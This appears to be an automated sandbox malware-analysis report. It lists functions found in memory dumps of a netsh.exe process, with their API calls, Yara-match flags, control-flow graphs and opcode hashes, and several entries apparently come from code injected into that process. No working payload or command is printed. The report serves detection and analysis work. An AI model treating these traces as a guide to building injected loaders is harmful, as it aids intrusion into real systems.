                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 03212BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53996151019.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000011.00000002.53997498399.00000000032C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000011.00000002.53997537432.00000000032CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_31a0000_netsh.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: 2662936983e6ec927c7416725abb36938710792d0a9f20c8fb4b985257dc1524
                                                                                                                                                                                          • Instruction ID: f5093c3712bce7df9d1845fe0461900f5271e91c7eb139f2708ec58869dd39f7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2662936983e6ec927c7416725abb36938710792d0a9f20c8fb4b985257dc1524
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F90023121101C12D500A5986908746044687E0301F52D415E9014555EC779C8D17132
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 03212A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53996151019.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000011.00000002.53997498399.00000000032C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000011.00000002.53997537432.00000000032CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_31a0000_netsh.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: 35e29781c7785e7d51aa7763d47bf883243f12321bf3a211369319914f137822
                                                                                                                                                                                          • Instruction ID: 388387f8e22a580c4d203e7fa7919a0332754d1596188b08d33226fad865baae
                                                                                                                                                                                          • Opcode Fuzzy Hash: 35e29781c7785e7d51aa7763d47bf883243f12321bf3a211369319914f137822
                                                                                                                                                                                          • Instruction Fuzzy Hash: A3900261212018134505B1585914716444B87E0201B52C425E5004590DC639C8D17126
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 032129F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53996151019.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000011.00000002.53997498399.00000000032C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000011.00000002.53997537432.00000000032CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_31a0000_netsh.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: b7b6c12fc47a0fd8b6a4ae3797076973e99c7e5e52a4613b21a8a592a8981282
                                                                                                                                                                                          • Instruction ID: b99677e939a72830fc6f94eb50d278d1d870385f74e69a1fed9776ec5d129647
                                                                                                                                                                                          • Opcode Fuzzy Hash: b7b6c12fc47a0fd8b6a4ae3797076973e99c7e5e52a4613b21a8a592a8981282
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F900225221018130505E5581B04607048787D5351352C425F5005550CD735C8A16122
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 03212F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53996151019.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000011.00000002.53997498399.00000000032C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000011.00000002.53997537432.00000000032CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_31a0000_netsh.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: 57bfa6e3bce9e1784d25a8d22399ae9b71bca36a7418d03731cbd92bab84c27e
                                                                                                                                                                                          • Instruction ID: b65bce4de1add0d8d6ef9470de2298e64e99b710ee46f49cabb35a79456d7950
                                                                                                                                                                                          • Opcode Fuzzy Hash: 57bfa6e3bce9e1784d25a8d22399ae9b71bca36a7418d03731cbd92bab84c27e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3390022122181852D600A5685D14B07044687D0303F52C519E4144554CCA29C8A16522
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 03212E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53996151019.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000011.00000002.53997498399.00000000032C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000011.00000002.53997537432.00000000032CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_31a0000_netsh.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: 5fd8a00608cf316574079a181df091899d674b95feb776aa7a342ce33cf3b281
                                                                                                                                                                                          • Instruction ID: 66458e264d8e7049928805392e0c0320a4afeb9839a38fc6f39ac7e8e621b32c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fd8a00608cf316574079a181df091899d674b95feb776aa7a342ce33cf3b281
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E90026135101C52D500A1585914B060446C7E1301F52C419E5054554DC72DCC927127
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 03212D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53996151019.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000011.00000002.53997498399.00000000032C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000011.00000002.53997537432.00000000032CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_31a0000_netsh.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: 1f21e38bd4fb465f7f4b1440b61897211dae6de5df6c42a361fe8d899cbf208f
                                                                                                                                                                                          • Instruction ID: 5e7e9a4730a02d7c657e1d80f4e481ff65964a34fde8bd3196220a49ee602228
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f21e38bd4fb465f7f4b1440b61897211dae6de5df6c42a361fe8d899cbf208f
                                                                                                                                                                                          • Instruction Fuzzy Hash: F690023121101C23D511A1585A04707044A87D0241F92C816E4414558DD76AC992B122
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 03212DC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53996151019.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000011.00000002.53997498399.00000000032C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000011.00000002.53997537432.00000000032CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_31a0000_netsh.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: ea4d815a9792925562feec8a0dea7a7ee11ad95aa0487bf6f0f4d621fb402cd6
                                                                                                                                                                                          • Instruction ID: 5cde34e2787ba174d17df93d3132d05405e36b566076ebdec83ac0ecdb363568
                                                                                                                                                                                          • Opcode Fuzzy Hash: ea4d815a9792925562feec8a0dea7a7ee11ad95aa0487bf6f0f4d621fb402cd6
                                                                                                                                                                                          • Instruction Fuzzy Hash: BA90027121101C12D540B1585904746044687D0301F52C415E9054554EC76DCDD57666
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 03212C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53996151019.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000011.00000002.53997498399.00000000032C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000011.00000002.53997537432.00000000032CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_31a0000_netsh.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: eeceb6692f2e3fed7ad09f1dd269aed3a43c2e67abd5cccd0af04e4bedc86069
                                                                                                                                                                                          • Instruction ID: b181512f269f7ad2478ef50c1da602db6826a63822c9bf125d7d06b0e2a4dcfa
                                                                                                                                                                                          • Opcode Fuzzy Hash: eeceb6692f2e3fed7ad09f1dd269aed3a43c2e67abd5cccd0af04e4bedc86069
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D90022922301812D580B158690870A044687D1202F92D819E4005558CCA29C8A96322
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 03212CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53996151019.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000011.00000002.53997498399.00000000032C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000011.00000002.53997537432.00000000032CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_31a0000_netsh.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: 469b7df728d2acd0e46d5088f16931183547384edd776fcde4d9b76fd10e077c
                                                                                                                                                                                          • Instruction ID: 116b86c7058366873212fbca8fa7aceb436bab62d26eb22df9673a539a7852f6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 469b7df728d2acd0e46d5088f16931183547384edd776fcde4d9b76fd10e077c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A900221252059625945F1585904607444797E0241792C416E5404950CC63AD896E622
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00729080 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 265 729080-7290af 266 7290bb-7290c2 265->266 267 7290b6 call 72bd40 265->267 268 7290c8-729118 call 72be10 call 71acf0 call 724e50 266->268 269 72919c-7291a2 266->269 267->266 276 729120-729131 Sleep 268->276 277 729133-729139 276->277 278 729196-72919a 276->278 279 729163-729183 277->279 280 72913b-729161 call 728ca0 277->280 278->269 278->276 282 729189-72918c 279->282 283 729184 call 728eb0 279->283 280->282 282->278 283->282
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Sleep.KERNELBASE(000007D0), ref: 00729128
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_710000_netsh.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                          • String ID: net.dll$wininet.dll
                                                                                                                                                                                          • API String ID: 3472027048-1269752229
                                                                                                                                                                                          • Opcode ID: 2fc5539ce258b5b6beccd941e799445f8f165c982dea3b187c6cdf1ac72fd1ad
                                                                                                                                                                                          • Instruction ID: 0565197d994f01d25ebd231f8bcf477f0423ea23ca9d1ea2d837aadb15d35c00
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fc5539ce258b5b6beccd941e799445f8f165c982dea3b187c6cdf1ac72fd1ad
                                                                                                                                                                                          • Instruction Fuzzy Hash: C031B0B2900355FBC724DF65D889FA7B7B8FB48B00F14811DF62A5B245DA34B660CBA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00729076 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 285 729076-7290c2 call 72bd40 288 7290c8-729118 call 72be10 call 71acf0 call 724e50 285->288 289 72919c-7291a2 285->289 296 729120-729131 Sleep 288->296 297 729133-729139 296->297 298 729196-72919a 296->298 299 729163-729183 297->299 300 72913b-729161 call 728ca0 297->300 298->289 298->296 302 729189-72918c 299->302 303 729184 call 728eb0 299->303 300->302 302->298 303->302
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Sleep.KERNELBASE(000007D0), ref: 00729128
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_710000_netsh.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                          • String ID: net.dll$wininet.dll
                                                                                                                                                                                          • API String ID: 3472027048-1269752229
                                                                                                                                                                                          • Opcode ID: 3fb2dc51dba7a7454fe69b4e59e782c6fdbe6b13b98d6c4cc67e36664045a021
                                                                                                                                                                                          • Instruction ID: 600a680f840b9c4e58d020496ed98e0d81498bb35bd398c9539c9288c561285e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fb2dc51dba7a7454fe69b4e59e782c6fdbe6b13b98d6c4cc67e36664045a021
                                                                                                                                                                                          • Instruction Fuzzy Hash: B421F2B2900315FBC714EF65D889BA7B7B8FB48B00F14801DF62D5B245D778A960CBA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0072A670 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 317 72a670-72a6a1 call 72af60 RtlFreeHeap
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00713AF8), ref: 0072A69D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_710000_netsh.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                          • String ID: .z`
                                                                                                                                                                                          • API String ID: 3298025750-1441809116
                                                                                                                                                                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                                          • Instruction ID: 87c1ec33dbb5edafb53f25e58cf7071fe38cfa03dfdffc68a6d3958eaecb994b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 98E046B1200218BBDB18EF99DC49EA777ACEF88B50F118558FE185B242C630F910CAF0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0072A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 314 72a630-72a661 call 72af60 RtlAllocateHeap
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(6Er,?,00724CAF,00724CAF,?,00724536,?,?,?,?,?,00000000,00000000,?), ref: 0072A65D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_710000_netsh.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                          • String ID: 6Er
                                                                                                                                                                                          • API String ID: 1279760036-3970100064
                                                                                                                                                                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                                          • Instruction ID: 3acff82ccb8294933802324fd8d188899832c44b5301911739dac6e725f9dc7f
                                                                                                                                                                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                                          • Instruction Fuzzy Hash: 49E012B1200218ABDB14EF99DC45EA777ACEF88A54F118558BA185B242C630F9108AB0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00718310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0071836A
                                                                                                                                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0071838B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_710000_netsh.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1836367815-0
                                                                                                                                                                                          • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                                                                                                                                                          • Instruction ID: 322bd7013044ddadd272c168882fcc0fb3c67dd6b519dbfd6464ab8b8fc51018
                                                                                                                                                                                          • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6601DB31A8122CB7E721A6989C47FFE776C5B41F50F054118FF04BA1C1EAD8690547F6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00718308 Relevance: 3.1, APIs: 2, Instructions: 54threadwindowCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 341 718308-71831f 342 718328-71835a call 72ca00 call 71acf0 call 724e50 341->342 343 718323 call 72be60 341->343 350 71835c-71836e PostThreadMessageW 342->350 351 71838e-718392 342->351 343->342 352 718370-71838b call 71a480 PostThreadMessageW 350->352 353 71838d 350->353 352->353 353->351
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0071836A
                                                                                                                                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0071838B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_710000_netsh.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1836367815-0
                                                                                                                                                                                          • Opcode ID: b71c06b53c8d09a97c16749fee5cae8f5fbea811a49904675febd411ae1e22b5
                                                                                                                                                                                          • Instruction ID: 3bd6821da3a81a7c2121399b4db553b4f51debfc5f2fd7022c5a61fe18cf236e
                                                                                                                                                                                          • Opcode Fuzzy Hash: b71c06b53c8d09a97c16749fee5cae8f5fbea811a49904675febd411ae1e22b5
                                                                                                                                                                                          • Instruction Fuzzy Hash: E401DD32941128B6E7219B949C47FFE776C5B41F51F054158FF04BA0C1D798690547F1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0071ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0071AD62
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_710000_netsh.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Load
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2234796835-0
                                                                                                                                                                                          • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                                                                                          • Instruction ID: 19b78f7bf4d57bf0186023646017b203f9029ca69284b07ede5c5e96d60cc652
                                                                                                                                                                                          • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 91011EB5E0020DBBDF10EAA4EC46FEDB3B89B54308F104595A90897681F635EB588B91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0072A7C1 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0071F1D2,0071F1D2,?,00000000,?,?), ref: 0072A800
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_710000_netsh.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3899507212-0
                                                                                                                                                                                          • Opcode ID: 4f8a6f1dafadf2907de0de7afd0a64e256a3a7e54fe363d8359facab6bc93e01
                                                                                                                                                                                          • Instruction ID: edbbbdeefc815c5c0cc53edd3435e9eefb1aa1b53c616b9bf3c84777056aa350
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f8a6f1dafadf2907de0de7afd0a64e256a3a7e54fe363d8359facab6bc93e01
                                                                                                                                                                                          • Instruction Fuzzy Hash: F6F0C8B52002187BCB10DF68EC45DE7775DDF85624F108259FD5D57642C935E81187F1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0072A6E0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0072A734
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_710000_netsh.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateInternalProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2186235152-0
                                                                                                                                                                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                                          • Instruction ID: 9ecc78a9044c94a785d0242d0d766a550178fd861a40649b47fa305494810077
                                                                                                                                                                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0201B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

